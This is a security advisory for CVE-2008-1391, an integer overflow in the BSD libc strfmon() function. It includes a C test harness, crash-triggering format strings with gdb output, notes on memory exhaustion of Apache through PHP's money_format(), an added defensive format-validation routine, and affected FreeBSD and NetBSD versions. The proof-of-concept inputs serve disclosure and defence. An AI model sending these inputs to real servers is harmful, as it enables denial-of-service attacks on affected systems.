BUGTRAQ ID: 28479
CVE ID: CVE-2008-1391
CNCVE ID: CNCVE-20081391
The strfmon() function on multiple BSD platforms contains an integer overflow. It may allow arbitrary code execution in the context of the affected application; a failed attempt can result in a denial of service.
The affected function has the following prototype:
#include <monetary.h>
ssize_t
strfmon(char * restrict s, size_t maxsize, const char * restrict format, ...);
--- 1. /usr/src/lib/libc/stdlib/strfmon.c - integer overflow
The main problem lies in strfmon() itself, and is reached when the function is used as follows:
---example-start--
#include <stdio.h>
#include <monetary.h>

int main(int argc, char *argv[])
{
    char buff[51];
    char *bux = buff;
    ssize_t res;

    if (argc < 2) {
        fprintf(stderr, "usage: %s <strfmon-format>\n", argv[0]);
        return 1;
    }
    /* the format string is taken straight from the command line;
       the value argument must be a double, so pass 0.0 rather than "0" */
    res = strfmon(bux, 50, argv[1], 0.0);
    if (res < 0)
        perror("strfmon");
    else
        printf("%s\n", bux);
    return 0;
}
---example-end--
Compile it and run it with a format string such as the following:
cxib# ./pln %99999999999999999999n
Segmentation fault (core dumped)
Under gdb the crash looks like this:
cxib# gdb -q pln
(no debugging symbols found)...(gdb) r %99999999999999999999n
Starting program: /cxib/C/pln %99999999999999999999n
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x2814e0e6 in memmove () from /lib/libc.so.7
(gdb)
The fault is in memmove(), reached while the buffer is being reallocated.
cxib# gdb -q pln
(no debugging symbols found)...(gdb) r %.9999999999n
Starting program: /cxib/C/pln %.9999999999n
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x2814f093 in abort () from /lib/libc.so.7
The next example:
cxib# ./pln %#99999999999999999999n
Long execution time. Let's try check this process :
--------------------------
cxib# ps -aux | grep pln
cxib 1843 89.1 13.2 140320 119588 p2 R+ 4:29PM 0:09.68
./pln %#99999999999999999999n
cxib# ps -aux | grep pln
cxib 1843 94.7 48.4 482336 438236 p2 R+ 4:29PM 1:54.07
./pln %#99999999999999999999n
1st sample: VSZ=140320
2nd sample: VSZ=482336
----------------------------
pln keeps allocating more and more memory. PHP uses strfmon() in its money_format() function, so when mod_php5 runs under Apache the same condition can be triggered through money_format(), with the following result:
---apache-child-die---
swap_pager: out of swap space
swap_pager_getswapspace(16): failed
Mar 15 21:03:23 cxib kernel: pid 1210 (httpd), uid 80, was killed: out of swap space
---apache-child-die---
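As an added defensive example (not from the advisory or the BSD source), the following pre-check rejects strfmon()-style format strings whose width, left precision ("#n") or right precision (".p") exceed a caller-chosen bound, so that untrusted input such as a money_format() argument never reaches libc with the huge fields shown above; the function name and the bound of 64 used in the comments are assumptions.

```c
#include <string.h>

/* Parse the decimal digits at *p into *out, returning 0 as soon as the value
 * would exceed max, so the check itself cannot overflow. */
static int parse_bounded(const char **p, int max, int *out)
{
    int v = 0;
    while (**p >= '0' && **p <= '9') {
        int d = **p - '0';
        if (max - d < 0 || v > (max - d) / 10)
            return 0;                       /* v * 10 + d would exceed max */
        v = v * 10 + d;
        (*p)++;
    }
    *out = v;
    return 1;
}

/* Return 1 if every conversion in fmt is well formed (known flags, 'i' or 'n'
 * conversion, "%%" literal) and its width, "#left" and ".right" fields are all
 * <= max_field; 0 otherwise. Meant as a pre-check on untrusted format strings
 * (e.g. money_format() input) before they are handed to strfmon(). */
int strfmon_format_is_safe(const char *fmt, int max_field)
{
    const char *p = fmt;
    int n;
    while (*p) {
        if (*p++ != '%') continue;          /* ordinary character */
        if (*p == '%') { p++; continue; }   /* "%%" literal percent */
        while (*p == '=' || (*p && strchr("^+(!-", *p))) {  /* optional flags */
            if (*p == '=' && *++p == '\0') return 0;   /* =f: f is the fill char */
            p++;
        }
        if (!parse_bounded(&p, max_field, &n)) return 0;    /* field width */
        if (*p == '#') {                                    /* left precision */
            p++;
            if (!parse_bounded(&p, max_field, &n)) return 0;
        }
        if (*p == '.') {                                    /* right precision */
            p++;
            if (!parse_bounded(&p, max_field, &n)) return 0;
        }
        if (*p != 'i' && *p != 'n') return 0;   /* conversion character */
        p++;
    }
    return 1;
}
```

A wrapper around money_format()/strfmon() would call this first and refuse the request (or fall back to a fixed format) when it returns 0.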
NetBSD NetBSD 4.0
FreeBSD FreeBSD 6.0 .x
FreeBSD FreeBSD 6.0 -STABLE
FreeBSD FreeBSD 6.0 -RELEASE
FreeBSD FreeBSD 7.0 BETA4
FreeBSD FreeBSD 7.0 -RELENG
FreeBSD FreeBSD 7.0 -PRERELEASE
FreeBSD FreeBSD 7.0
FreeBSD FreeBSD 6.0 -RELEASE-p5
Contact the vendor for patch information:
http://www.netbsd.org/